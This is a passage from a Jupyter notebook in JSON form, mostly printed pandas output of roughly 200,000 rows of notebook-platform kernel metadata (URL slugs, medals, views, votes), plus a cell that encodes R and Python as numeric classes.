"201979 NaN NaN 6658388.0 \n",
"201980 NaN 69150.0 6660859.0 \n",
"\n",
" IsProjectLanguageTemplate \\\n",
"0 False \n",
"1 False \n",
"2 False \n",
"3 False \n",
"4 False \n",
"5 False \n",
"6 False \n",
"7 False \n",
"8 False \n",
"9 False \n",
"10 False \n",
"11 False \n",
"12 False \n",
"13 False \n",
"14 False \n",
"15 False \n",
"16 False \n",
"17 False \n",
"18 False \n",
"19 False \n",
"20 False \n",
"21 False \n",
"22 False \n",
"23 False \n",
"24 False \n",
"25 False \n",
"26 False \n",
"27 False \n",
"28 False \n",
"29 False \n",
"... ... \n",
"201951 False \n",
"201952 False \n",
"201953 False \n",
"201954 False \n",
"201955 False \n",
"201956 False \n",
"201957 False \n",
"201958 False \n",
"201959 False \n",
"201960 False \n",
"201961 False \n",
"201962 False \n",
"201963 False \n",
"201964 False \n",
"201965 False \n",
"201966 False \n",
"201967 False \n",
"201968 False \n",
"201969 False \n",
"201970 False \n",
"201971 False \n",
"201972 False \n",
"201973 False \n",
"201974 False \n",
"201975 False \n",
"201976 False \n",
"201977 False \n",
"201978 False \n",
"201979 False \n",
"201980 False \n",
"\n",
" CurrentUrlSlug Medal TotalViews \\\n",
"0 hello NaN 24 \n",
"1 rf-proximity 3.0 7547 \n",
"2 r-version NaN 9 \n",
"3 test1 NaN 9 \n",
"4 are-icons-missing NaN 7 \n",
"5 testing-version-bolding NaN 13 \n",
"6 testing-version-bolding-with-new-script NaN 2 \n",
"7 as-raster NaN 2 \n",
"8 whoops-doing-this-logged-in-under-my-own-name NaN 6 \n",
"9 installed-packages NaN 6 \n",
"10 installed-r-packages NaN 7921 \n",
"11 example-handwritten-digits 3.0 29080 \n",
"12 mean-digits NaN 9 \n",
"13 pixel-mean-and-variances-by-digit NaN 9989 \n",
"14 random-forest-benchmark-tree-4 NaN 7 \n",
"15 random-forest-benchmark-1 2.0 52294 \n",
"16 dougg-test NaN 164 \n",
"17 some-basic-stats NaN 230 \n",
"18 rotate-all-the-features NaN 2491 \n",
"19 running-system-commands NaN 0 \n",
"20 running-system-commands-1 NaN 84 \n",
"21 we-have-imagemagick-installed NaN 685 \n",
"22 randombananaclassifier NaN 766 \n",
"23 mytest NaN 124 \n",
"24 peek-data NaN 1064 \n",
"25 example-r NaN 337 \n",
"26 testo NaN 58 \n",
"27 python NaN 7 \n",
"28 digit-recognizer NaN 142 \n",
"29 digit-recognizer-using-knn NaN 717 \n",
"... ... ... ... \n",
"201951 project-euler-21 NaN 18 \n",
"201952 ny-stock-price-prediction-rnn-lstm-gru-eb2000 NaN 37 \n",
"201953 starter-banknote-f2165545-1 NaN 0 \n",
"201954 lightgbm-automated-feature-engineering-easy NaN 57 \n",
"201955 a3-demo-decision-trees NaN 29 \n",
"201956 starter-twitter-worlds2018-0cb7d034-3 NaN 3 \n",
"201957 starter-twitter-worlds2018 NaN 39 \n",
"201958 tutorial-linear-regression NaN 22 \n",
"201959 mks-proteins NaN 208 \n",
"201960 exploration-of-f1-dataset-1102f3-aaf5b9 NaN 41 \n",
"201961 fraud-detection NaN 17 \n",
"201962 google-customer-revenue-prediction NaN 239 \n",
"201963 diabeticretinopathyvgg16-finetuning NaN 144 \n",
"201964 protein-atlas-exploration-and-baseline NaN 17 \n",
"201965 01-iris-species NaN 36 \n",
"201966 chicago-crime-investigation NaN 71 \n",
"201967 cnn-128x128x4-keras-from-scratch-lb-0-328 2.0 1808 \n",
"201968 transforma-o-de-vari-veis NaN 117 \n",
"201969 apply-t-sne-on-news 3.0 907 \n",
"201970 redu-o-de-dimensionalidade NaN 43 \n",
"201971 clusteriza-o NaN 33 \n",
"201972 starter-twitter-data-4e7ab639-b NaN 2 \n",
"201973 how-to-score-0-0255-0-0245-top-10-score NaN 552 \n",
"201974 house-price-xgboost NaN 11 \n",
"201975 starter-twitter-sentiment-analysis-f08e9d52-d NaN 4 \n",
"201976 mnist-with-fastai-style NaN 6 \n",
"201977 a-begining-try NaN 31 \n",
"201978 getting-started-in-r-first-steps-337898 NaN 4 \n",
"201979 my-first-data-science-homework NaN 70 \n",
"201980 u-s-democrat-and-republican-tweet-exploration NaN 82 \n",
"\n",
" TotalComments TotalVotes LanguageName \n",
"0 0 0 1 \n",
"1 1 12 1 \n",
"2 0 0 1 \n",
"3 0 0 1 \n",
"4 0 0 1 \n",
"5 0 0 1 \n",
"6 0 0 1 \n",
"7 0 0 1 \n",
"8 0 0 1 \n",
"9 0 0 1 \n",
"10 2 6 1 \n",
"11 8 36 1 \n",
"12 0 0 1 \n",
"13 5 8 1 \n",
"14 0 0 1 \n",
"15 23 91 1 \n",
"16 0 0 1 \n",
"17 0 0 1 \n",
"18 0 4 1 \n",
"19 0 0 1 \n",
"20 0 0 1 \n",
"21 1 0 1 \n",
"22 0 1 1 \n",
"23 0 0 1 \n",
"24 0 0 1 \n",
"25 0 0 1 \n",
"26 0 0 1 \n",
"27 0 0 1 \n",
"28 0 0 1 \n",
"29 0 0 1 \n",
"... ... ... ... \n",
"201951 0 1 2 \n",
"201952 0 0 2 \n",
"201953 0 0 2 \n",
"201954 0 1 2 \n",
"201955 0 0 2 \n",
"201956 0 0 2 \n",
"201957 0 1 2 \n",
"201958 0 0 2 \n",
"201959 0 0 1 \n",
"201960 0 0 2 \n",
"201961 0 0 2 \n",
"201962 3 3 2 \n",
"201963 0 1 2 \n",
"201964 0 0 2 \n",
"201965 0 1 2 \n",
"201966 0 0 2 \n",
"201967 15 36 2 \n",
"201968 0 13 2 \n",
"201969 7 15 2 \n",
"201970 0 1 2 \n",
"201971 0 1 2 \n",
"201972 0 0 2 \n",
"201973 2 10 2 \n",
"201974 0 0 2 \n",
"201975 0 0 2 \n",
"201976 0 0 2 \n",
"201977 0 0 2 \n",
"201978 0 0 1 \n",
"201979 0 2 2 \n",
"201980 2 4 1 \n",
"\n",
"[201981 rows x 13 columns]"
]
},
"execution_count": 6,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
    "# Encode LanguageName as numeric classes (R -> 1, Python -> 2).\n",
    "# Use .loc rather than chained indexing, which is unreliable and\n",
    "# raises SettingWithCopyWarning in pandas.\n",
    "df.loc[df.LanguageName == \"R\", \"LanguageName\"] = 1\n",
    "df.loc[df.LanguageName == \"Python\", \"LanguageName\"] = 2\n",
    "df"
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>1.0</td>\n",
" <td>0.0</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>0.0</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>9.0</td>\n",
" <td>0.0</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>13.0</td>\n",
" <td>0.0</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>15.0</td>\n",
" <td>0.0</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>5</th>\n",
" <td>7</td>\n",
" <td>3716</td>\n",
" <td>48.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>27.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding</td>\n",
" <td>NaN</td>\n",
" <td>13</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>6</th>\n",
" <td>9</td>\n",
" <td>3716</td>\n",
" <td>50.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>49.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding-with-new-script</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>7</th>\n",
" <td>11</td>\n",
" <td>3716</td>\n",
" <td>373.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>54.0</td>\n",
" <td>0.0</td>\n",
" <td>as-raster</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>8</th>\n",
" <td>12</td>\n",
" <td>993</td>\n",
" <td>6467.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>55.0</td>\n",
" <td>0.0</td>\n",
" <td>whoops-doing-this-logged-in-under-my-own-name</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>9</th>\n",
" <td>13</td>\n",
" <td>993</td>\n",
" <td>6468.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>73.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-packages</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>10</th>\n",
" <td>14</td>\n",
" <td>993</td>\n",
" <td>269065.0</td>\n",
" <td>NaN</td>\n",
" <td>14925.0</td>\n",
" <td>77.0</td>\n",
" <td>0.0</td>\n",
" <td>installed-r-packages</td>\n",
" <td>NaN</td>\n",
" <td>7921</td>\n",
" <td>2</td>\n",
" <td>6</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>11</th>\n",
" <td>15</td>\n",
" <td>993</td>\n",
" <td>520.0</td>\n",
" <td>NaN</td>\n",
" <td>20068.0</td>\n",
" <td>140.0</td>\n",
" <td>0.0</td>\n",
" <td>example-handwritten-digits</td>\n",
" <td>3.0</td>\n",
" <td>29080</td>\n",
" <td>8</td>\n",
" <td>36</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>12</th>\n",
" <td>16</td>\n",
" <td>993</td>\n",
" <td>154.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>141.0</td>\n",
" <td>0.0</td>\n",
" <td>mean-digits</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>13</th>\n",
" <td>17</td>\n",
" <td>993</td>\n",
" <td>649.0</td>\n",
" <td>NaN</td>\n",
" <td>18337.0</td>\n",
" <td>155.0</td>\n",
" <td>0.0</td>\n",
" <td>pixel-mean-and-variances-by-digit</td>\n",
" <td>NaN</td>\n",
" <td>9989</td>\n",
" <td>5</td>\n",
" <td>8</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>14</th>\n",
" <td>20</td>\n",
" <td>993</td>\n",
" <td>803.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>171.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-tree-4</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>15</th>\n",
" <td>21</td>\n",
" <td>993</td>\n",
" <td>1227.0</td>\n",
" <td>NaN</td>\n",
" <td>17462.0</td>\n",
" <td>185.0</td>\n",
" <td>0.0</td>\n",
" <td>random-forest-benchmark-1</td>\n",
" <td>2.0</td>\n",
" <td>52294</td>\n",
" <td>23</td>\n",
" <td>91</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>16</th>\n",
" <td>22</td>\n",
" <td>206545</td>\n",
" <td>190.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>188.0</td>\n",
" <td>0.0</td>\n",
" <td>dougg-test</td>\n",
" <td>NaN</td>\n",
" <td>164</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>17</th>\n",
" <td>23</td>\n",
" <td>114978</td>\n",
" <td>193.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>191.0</td>\n",
" <td>0.0</td>\n",
" <td>some-basic-stats</td>\n",
" <td>NaN</td>\n",
" <td>230</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>18</th>\n",
" <td>24</td>\n",
" <td>114978</td>\n",
" <td>308.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>194.0</td>\n",
" <td>0.0</td>\n",
" <td>rotate-all-the-features</td>\n",
" <td>NaN</td>\n",
" <td>2491</td>\n",
" <td>0</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>19</th>\n",
" <td>25</td>\n",
" <td>993</td>\n",
" <td>213.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>209.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>20</th>\n",
" <td>26</td>\n",
" <td>993</td>\n",
" <td>212.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>212.0</td>\n",
" <td>0.0</td>\n",
" <td>running-system-commands-1</td>\n",
" <td>NaN</td>\n",
" <td>84</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>21</th>\n",
" <td>27</td>\n",
" <td>993</td>\n",
" <td>294.0</td>\n",
" <td>NaN</td>\n",
" <td>35477.0</td>\n",
" <td>214.0</td>\n",
" <td>0.0</td>\n",
" <td>we-have-imagemagick-installed</td>\n",
" <td>NaN</td>\n",
" <td>685</td>\n",
" <td>1</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>22</th>\n",
" <td>29</td>\n",
" <td>114978</td>\n",
" <td>238.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>216.0</td>\n",
" <td>0.0</td>\n",
" <td>randombananaclassifier</td>\n",
" <td>NaN</td>\n",
" <td>766</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>23</th>\n",
" <td>30</td>\n",
" <td>9679</td>\n",
" <td>236.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>236.0</td>\n",
" <td>0.0</td>\n",
" <td>mytest</td>\n",
" <td>NaN</td>\n",
" <td>124</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>24</th>\n",
" <td>31</td>\n",
" <td>185835</td>\n",
" <td>261.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>239.0</td>\n",
" <td>0.0</td>\n",
" <td>peek-data</td>\n",
" <td>NaN</td>\n",
" <td>1064</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>25</th>\n",
" <td>32</td>\n",
" <td>19605</td>\n",
" <td>244.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>244.0</td>\n",
" <td>0.0</td>\n",
" <td>example-r</td>\n",
" <td>NaN</td>\n",
" <td>337</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>26</th>\n",
" <td>33</td>\n",
" <td>319768</td>\n",
" <td>253.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>253.0</td>\n",
" <td>0.0</td>\n",
" <td>testo</td>\n",
" <td>NaN</td>\n",
" <td>58</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>27</th>\n",
" <td>34</td>\n",
" <td>28963</td>\n",
" <td>19064.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>262.0</td>\n",
" <td>0.0</td>\n",
" <td>python</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>28</th>\n",
" <td>35</td>\n",
" <td>320040</td>\n",
" <td>264.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>263.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer</td>\n",
" <td>NaN</td>\n",
" <td>142</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>29</th>\n",
" <td>39</td>\n",
" <td>319893</td>\n",
" <td>552.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>321.0</td>\n",
" <td>0.0</td>\n",
" <td>digit-recognizer-using-knn</td>\n",
" <td>NaN</td>\n",
" <td>717</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>...</th>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201951</th>\n",
" <td>1875333</td>\n",
" <td>442623</td>\n",
" <td>6498125.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6495275.0</td>\n",
" <td>0.0</td>\n",
" <td>project-euler-21</td>\n",
" <td>NaN</td>\n",
" <td>18</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201952</th>\n",
" <td>1875398</td>\n",
" <td>1497793</td>\n",
" <td>6497141.0</td>\n",
" <td>2395222.0</td>\n",
" <td>NaN</td>\n",
" <td>6497049.0</td>\n",
" <td>0.0</td>\n",
" <td>ny-stock-price-prediction-rnn-lstm-gru-eb2000</td>\n",
" <td>NaN</td>\n",
" <td>37</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201953</th>\n",
" <td>1875414</td>\n",
" <td>2080166</td>\n",
" <td>6494175.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6494175.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-banknote-f2165545-1</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201954</th>\n",
" <td>1875417</td>\n",
" <td>1776773</td>\n",
" <td>6499806.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6498408.0</td>\n",
" <td>0.0</td>\n",
" <td>lightgbm-automated-feature-engineering-easy</td>\n",
" <td>NaN</td>\n",
" <td>57</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201955</th>\n",
" <td>1915910</td>\n",
" <td>498422</td>\n",
" <td>6657552.0</td>\n",
" <td>6528403.0</td>\n",
" <td>NaN</td>\n",
" <td>6655666.0</td>\n",
" <td>0.0</td>\n",
" <td>a3-demo-decision-trees</td>\n",
" <td>NaN</td>\n",
" <td>29</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201956</th>\n",
" <td>1915916</td>\n",
" <td>2080166</td>\n",
" <td>6655493.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655493.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018-0cb7d034-3</td>\n",
" <td>NaN</td>\n",
" <td>3</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201957</th>\n",
" <td>1915988</td>\n",
" <td>1660833</td>\n",
" <td>6656526.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655878.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-worlds2018</td>\n",
" <td>NaN</td>\n",
" <td>39</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201958</th>\n",
" <td>1916035</td>\n",
" <td>1179427</td>\n",
" <td>6661990.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6661990.0</td>\n",
" <td>0.0</td>\n",
" <td>tutorial-linear-regression</td>\n",
" <td>NaN</td>\n",
" <td>22</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201959</th>\n",
" <td>1916052</td>\n",
" <td>1828058</td>\n",
" <td>6730922.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656151.0</td>\n",
" <td>0.0</td>\n",
" <td>mks-proteins</td>\n",
" <td>NaN</td>\n",
" <td>208</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201960</th>\n",
" <td>1916057</td>\n",
" <td>1601569</td>\n",
" <td>6730437.0</td>\n",
" <td>6633328.0</td>\n",
" <td>NaN</td>\n",
" <td>6668207.0</td>\n",
" <td>0.0</td>\n",
" <td>exploration-of-f1-dataset-1102f3-aaf5b9</td>\n",
" <td>NaN</td>\n",
" <td>41</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201961</th>\n",
" <td>1916068</td>\n",
" <td>1267737</td>\n",
" <td>6656222.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656222.0</td>\n",
" <td>0.0</td>\n",
" <td>fraud-detection</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201962</th>\n",
" <td>1916091</td>\n",
" <td>756325</td>\n",
" <td>6656455.0</td>\n",
" <td>NaN</td>\n",
" <td>69117.0</td>\n",
" <td>6656455.0</td>\n",
" <td>0.0</td>\n",
" <td>google-customer-revenue-prediction</td>\n",
" <td>NaN</td>\n",
" <td>239</td>\n",
" <td>3</td>\n",
" <td>3</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201963</th>\n",
" <td>1916101</td>\n",
" <td>1090244</td>\n",
" <td>6690675.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656399.0</td>\n",
" <td>0.0</td>\n",
" <td>diabeticretinopathyvgg16-finetuning</td>\n",
" <td>NaN</td>\n",
" <td>144</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201964</th>\n",
" <td>1916124</td>\n",
" <td>1170777</td>\n",
" <td>6805081.0</td>\n",
" <td>6632919.0</td>\n",
" <td>NaN</td>\n",
" <td>6805081.0</td>\n",
" <td>0.0</td>\n",
" <td>protein-atlas-exploration-and-baseline</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201965</th>\n",
" <td>1916181</td>\n",
" <td>2386017</td>\n",
" <td>6660035.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659703.0</td>\n",
" <td>0.0</td>\n",
" <td>01-iris-species</td>\n",
" <td>NaN</td>\n",
" <td>36</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201966</th>\n",
" <td>1916199</td>\n",
" <td>2108937</td>\n",
" <td>6938214.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657733.0</td>\n",
" <td>0.0</td>\n",
" <td>chicago-crime-investigation</td>\n",
" <td>NaN</td>\n",
" <td>71</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201967</th>\n",
" <td>1916215</td>\n",
" <td>637434</td>\n",
" <td>6904698.0</td>\n",
" <td>6600035.0</td>\n",
" <td>69362.0</td>\n",
" <td>6657640.0</td>\n",
" <td>0.0</td>\n",
" <td>cnn-128x128x4-keras-from-scratch-lb-0-328</td>\n",
" <td>2.0</td>\n",
" <td>1808</td>\n",
" <td>15</td>\n",
" <td>36</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201968</th>\n",
" <td>1916243</td>\n",
" <td>885589</td>\n",
" <td>6895750.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6656920.0</td>\n",
" <td>0.0</td>\n",
" <td>transforma-o-de-vari-veis</td>\n",
" <td>NaN</td>\n",
" <td>117</td>\n",
" <td>0</td>\n",
" <td>13</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201969</th>\n",
" <td>1916268</td>\n",
" <td>1113072</td>\n",
" <td>6941531.0</td>\n",
" <td>NaN</td>\n",
" <td>69337.0</td>\n",
" <td>6658725.0</td>\n",
" <td>0.0</td>\n",
" <td>apply-t-sne-on-news</td>\n",
" <td>3.0</td>\n",
" <td>907</td>\n",
" <td>7</td>\n",
" <td>15</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201970</th>\n",
" <td>1916283</td>\n",
" <td>885589</td>\n",
" <td>6684908.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657006.0</td>\n",
" <td>0.0</td>\n",
" <td>redu-o-de-dimensionalidade</td>\n",
" <td>NaN</td>\n",
" <td>43</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201971</th>\n",
" <td>1916285</td>\n",
" <td>885589</td>\n",
" <td>6681010.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657012.0</td>\n",
" <td>0.0</td>\n",
" <td>clusteriza-o</td>\n",
" <td>NaN</td>\n",
" <td>33</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201972</th>\n",
" <td>1916310</td>\n",
" <td>2080166</td>\n",
" <td>6657002.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657002.0</td>\n",
" <td>0.0</td>\n",
" <td>starter-twitter-data-4e7ab639-b</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201973</th>\n",
" <td>1916350</td>\n",
" <td>2092403</td>\n",
" <td>6671885.0</td>\n",
" <td>NaN</td>\n",
